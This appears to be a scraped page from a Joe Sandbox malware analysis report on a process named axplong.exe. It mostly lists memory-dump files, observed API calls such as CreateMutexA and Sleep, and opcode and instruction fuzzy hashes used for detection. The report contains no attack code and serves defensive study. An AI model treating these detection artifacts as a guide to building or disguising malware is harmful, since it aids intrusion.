Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 0cb2ec1aac4aa9f8da3c074395bc5ff9557685e3e67938569a2ed39da7c1dc23
Instruction ID: 71b14b74451a82f59d65f794675a315ad2b61e2496f3fe0735177780018da1d8
Opcode Fuzzy Hash: 0cb2ec1aac4aa9f8da3c074395bc5ff9557685e3e67938569a2ed39da7c1dc23
Instruction Fuzzy Hash: 3E219E703482009AFB286BFCD8C677D76639F91704F20492AE141DB7D2CB759882A2E3

Function 0066D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0066A6D3,00000001,00000364,00000006,000000FF,?,0066ECFF,?,00000004,00000000,?,?), ref: 0066D731

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2dce1fe8a953f35e0727bbc026a26194a6392ffd1a9068c759d8b9ba44c46c81
Instruction ID: 6c123458abef4bea9241b322d261e671ddd2787545c5218c5240bb51151bb5d2
Opcode Fuzzy Hash: 2dce1fe8a953f35e0727bbc026a26194a6392ffd1a9068c759d8b9ba44c46c81
Instruction Fuzzy Hash: 14F0E231F0523566DB212F269D05B9B3F8B9F917B1F198112AC04AA281CE31DC0043F3

Analysis Process: axplong.exePID: 9040, Parent PID: 1376COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1866
Total number of Limit Nodes:	15

Executed Functions

Function 0066645B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0066645A,?,?,?,?,?,006674AE), ref: 00666497

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a267273d2f40b9513487cd9372fc11241e9dc35585ce944f0938d1f7aa4c0463
Instruction ID: ccbe99c0c196711dba891417edce332289dd10af0576606f44e5f50de2cd62ec
Opcode Fuzzy Hash: a267273d2f40b9513487cd9372fc11241e9dc35585ce944f0938d1f7aa4c0463
Instruction Fuzzy Hash: E2E04630140A08AFCA257B54E9299883B9BEF92344F108818F80856372CA69EC81C981

Function 00639AD5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: b462b75808868396b20aef17be193eb2a83279f7327410201b2bfdf8e2da8397
Instruction ID: 9c76f1bff1e89024a77de16109d42eb56c8aee3a5825c5b994d82e7c260697d1
Opcode Fuzzy Hash: b462b75808868396b20aef17be193eb2a83279f7327410201b2bfdf8e2da8397
Instruction Fuzzy Hash: 59312871B041048BEF0CDB68EC8876EB777EFC6310F204658E0519B7D5C77599818BA1

Function 00639E74 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 91f46cb7d2b2d108119ceaacca18e5f5cf4874f6fea1c7d035f43614937ad3e2
Instruction ID: 359a7a2510adb5c3253fd85bc2b79e68a9e48e282e6ed4fd6128622c99f9a84b
Opcode Fuzzy Hash: 91f46cb7d2b2d108119ceaacca18e5f5cf4874f6fea1c7d035f43614937ad3e2
Instruction Fuzzy Hash: 43312571B042008BEF1CDBA8DC887ADB767AFC6310F20465CE454AB7E5D77589818BA1

Function 00639FA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

